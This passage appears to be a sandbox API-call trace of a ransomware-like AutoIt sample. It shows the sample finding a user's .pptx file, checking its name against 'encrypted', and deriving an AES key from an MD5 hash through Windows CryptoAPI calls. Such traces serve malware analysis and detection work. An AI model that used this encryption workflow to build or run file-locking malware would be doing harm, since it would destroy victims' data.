cchCount2=1) returned 3 [0032.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.655] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.655] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.655] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.655] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0xf13a8410, ftLastWriteTime.dwHighDateTime=0x1d5738b, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 0x7c20c0 [0032.655] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.655] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.656] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0xf13a8410, ftLastWriteTime.dwHighDateTime=0x1d5738b, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 0x7c20c0 [0032.656] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.656] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rjt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jt0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hcE.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.657] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.657] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.657] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.657] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.657] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.657] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.657] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.658] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0xf13a8410, ftLastWriteTime.dwHighDateTime=0x1d5738b, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 0x7c2240 [0032.658] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.658] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.658] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.658] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.658] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.658] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.659] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.659] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0032.659] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.660] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.660] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.660] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.660] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.660] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.660] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.660] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.660] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.661] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.661] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.661] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.661] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.661] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.661] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.662] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.662] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.662] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.662] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0032.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] 